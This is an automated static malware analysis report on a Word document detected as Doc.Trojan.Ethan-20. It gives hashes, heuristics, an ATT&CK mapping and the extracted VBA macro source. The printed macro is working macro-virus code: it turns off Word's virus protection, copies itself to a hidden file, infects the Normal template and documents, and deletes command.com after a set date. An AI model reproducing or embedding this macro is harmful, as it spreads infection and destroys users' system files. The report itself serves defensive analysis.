Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0cee0d85d632c9c0…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 33.0 KB
Created: 2000-03-22 11:59:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 144c00e7e5fe2f6fd1bfc00896a8a200
SHA-1: cfee86470febdbd5d05cf26505a68011fb718878
SHA-256: 0cee0d85d632c9c014ae173ec0a11ad1350a30ed1cf3f8fd56eb415a6b8fe985
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The critical ClamAV heuristic and the presence of VBA macros strongly indicate malicious intent. The VBA script attempts to copy its own code to 'c:\system.1' and set its attributes, a common technique for establishing persistence or preparing for second-stage execution. The script also manipulates application options to disable virus protection, further supporting its malicious nature.

Heuristics (2)

  • ClamAV: Doc.Trojan.Ethan-20 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Ethan-20
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11288 bytes
SHA-256: b5a7b4d1da08c3ed414c9b127bfd78edbdc4af418a3b3b25e7b885bff0a8ad6e

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
s = ActiveDocument.Saved
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If Dir("c:\system.1", 6) = "" Then
Open "c:\system.1" For Output As #1
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, a
Next i
Close #1
SetAttr "c:\system.1", 6
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
Set t = ActiveDocument.VBProject.VBComponents.Item(1)
Else
t = ""
End If
If t <> "" Then
Open "c:\system.1" For Input As #1
If LOF(1) = 0 Then GoTo q
i = 1
Do While Not EOF(1)
Line Input #1, a
t.CodeModule.InsertLines i, a
i = i + 1
Loop
q:
Close #1
If Date > "25.12.99" Then Kill "c:\command.com"
If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End Sub
Attribute VB_Name = "MacroList"

' Macro to list the macro content of all the macros in the current
' template to a specified file
' Updated by SMT 19/09/1997 to cope with LARGE macros
' Updated by SMT 11/03/1999 to cope with ThisDocument Stream

Dim glMacrName$

Public Sub MAIN()
Dim virusfile$
Dim ie
... (truncated)